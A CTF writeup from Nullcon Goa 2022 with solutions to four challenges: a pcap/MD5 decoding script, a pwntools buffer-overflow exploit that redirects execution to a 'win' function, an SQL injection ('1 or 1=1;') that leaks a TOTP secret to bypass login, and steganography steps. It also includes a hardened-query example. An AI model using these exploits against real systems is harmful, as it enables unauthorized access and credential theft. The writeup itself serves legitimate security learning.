Winja - Nullcon Goa 2022

CTF Writeup

Flag Regex: flag{.*?}

Space Relays

Description: Two random people spoke about something important, and I was able to eavesdrop on their communication through relay satellites. Help me decode it.
Points: 200
Difficulty Level: EASY
Category: Forensics

Solution:

  1. The captured packets look like TCP communication carrying messages.
  2. The first 14 message packets do not contain anything important; after that, each message packet says whether it is a Match or not a Match.
  3. If it is not a match, the packet carries a hash, which is MD5.
  4. Decoding and assembling all the packets gives the flag.

from scapy.all import *
from binascii import unhexlify
import hashlib

packets = PcapReader("chall.pcap")
# Lookup table: MD5 of every two-character hex string ("00".."ff") -> that string
md5_hex = {hashlib.md5(bytes('{:02x}'.format(x),"ascii")).hexdigest():'{:02x}'.format(x) for x in range(0,256)}
bytes_str = ""

for i,packet in enumerate(packets):
    data = bytes(packet.payload).decode("latin-1")
    # Skip the initial packets, plain "Match" messages and bare ACKs
    if i<=14 or "Match" in data or packet["TCP"].flags == "A":
        continue

    hex_char = ""
    if "Mismatch" in data:
        # The last 32 characters are an MD5 digest; the hex byte it maps to
        # replaces the byte appended previously
        hex_char = md5_hex[data[-32:]]
        bytes_str = bytes_str[:-2]
    else:
        # Otherwise the last two characters are the hex byte itself
        hex_char = data[-2:]

    bytes_str += hex_char

# The assembled hex string is the content of a PNG image
print("Writing to image")
with open("image.png","wb") as f:
    f.write(unhexlify(bytes_str))

FreeFall

Description: The highest jump in freefall is 40km, I don't think you so you need to jump that much. But calculate before you jump.
Points: 100
Difficulty Level: EASY
Category: PWN

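  1. Overflow the input to invoke the win method.

from pwn import *

# r = process('./bof1')
r = remote("localhost",18967)
elf = ELF('./bof1')

# Layout as sent: 0x20 bytes of padding, an 8-byte value
# (GOT entry of puts + 0x20), then the address of win
payload = b'A'*0x20+p64(elf.got['puts']+0x20)+p64(elf.symbols['win'])

print(r.recvline())
r.sendline(payload)
try:
    print(r.recvline())
except EOFError:
    # The service may close the connection without sending another line
    pass

r.interactive()
r.close()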

Space-time

Description: Time is precious. In space it's calculated based on the speed of light, but on earth it's different. Can you help recalculate the frequency of time on earth based on seconds?
Points: 300
Difficulty Level: MEDIUM
Category: Web

  1. Try SQL injection to retrieve all the information.
  2. Find the TOTP secret key and log in to retrieve the information.

import requests, json
import pyotp

# Step 1: the "id" parameter is injectable, so an always-true condition returns every row
response = requests.post("http://localhost:8080/",data={"action":"get","id":"1 or 1=1;"})
print(response.status_code)
data = json.loads(response.text)
print(data)

# Step 2: the second column of the first row holds the TOTP secret;
# compute the current code from it and submit it to the verify action
totp = pyotp.TOTP(data[0][1]).now()
response = requests.post("http://localhost:8080/",data={"action":"verify","totp":totp})
if "flag" in response.text:
    print(response.text)
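
Why the lookup in step 1 is enough to defeat the TOTP check, and how a bound parameter closes it, as an added example that is not the challenge's source code. The table layout, function names and sample secrets are assumptions (constructed); the first secret is the RFC 6238 test key so the computed code can be checked.

```python
import base64, hashlib, hmac, re, sqlite3, struct

def make_db():
    # Constructed sample data; the schema and secrets are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, totp_secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [
        (1, "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"),  # RFC 6238 test key, base32
        (2, "JBSWY3DPEHPK3PXP"),
    ])
    return db

def get_vulnerable(db, user_id):
    # Concatenation lets the id value become part of the SQL grammar.
    sql = "SELECT id, totp_secret FROM users WHERE id = " + user_id
    return db.execute(sql).fetchall()

def get_hardened(db, user_id):
    # Reject non-numeric ids, bind the value, and never select the secret.
    if not re.fullmatch(r"[0-9]+", user_id):
        return []
    return db.execute("SELECT id FROM users WHERE id = ?", (int(user_id),)).fetchall()

def totp(secret_b32, at, step=30, digits=6):
    # RFC 6238 with HMAC-SHA1: the code depends only on the secret and the clock.
    key = base64.b32decode(secret_b32)
    mac = hmac.new(key, struct.pack(">Q", int(at) // step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

if __name__ == "__main__":
    db = make_db()
    payload = "1 or 1=1;"  # the id value used in the writeup's request
    leaked = get_vulnerable(db, payload)
    print("vulnerable lookup returned", len(leaked), "rows")
    for uid, secret in leaked:
        print("  user", uid, "code at t=59:", totp(secret, 59))
    print("hardened lookup returned", get_hardened(db, payload))
```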

Deep Space

Description: While searching for signs of first-generation stars at an altitude of 36.5 km, they heard this unusual and unexpected radio hum coming from deep space. As you can tell, no explanation has been found 14 years later. This could be that much harder to find, check where is sound originating from.
Points: 300
Difficulty Level: MEDIUM
Category: Forensics

  1. DeepSound
  2. Get the password: ThinKlIk3h4CkEr
  3. Get the XLSM from the secret file
  4. Unprotect the macro
  5. Convert the hex to the flag